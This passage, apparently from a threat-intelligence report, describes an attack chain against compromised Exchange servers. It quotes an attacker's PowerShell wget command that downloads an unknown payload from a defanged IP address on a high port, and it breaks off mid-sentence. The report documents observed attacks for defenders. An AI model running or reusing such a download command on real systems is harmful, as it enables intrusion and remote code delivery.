Attack chain
Exchange servers are compromised through an as yet unidentified technique. On exploitation, the attacker executes a PowerShell command such as the following:
powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH
Other powershell wget commands to the same IP address use similar seemingly random high port numbers. It is unknown exactly what is downloaded by the PowerShell command; however, the attackers maintain access on victim networks for at least several days before …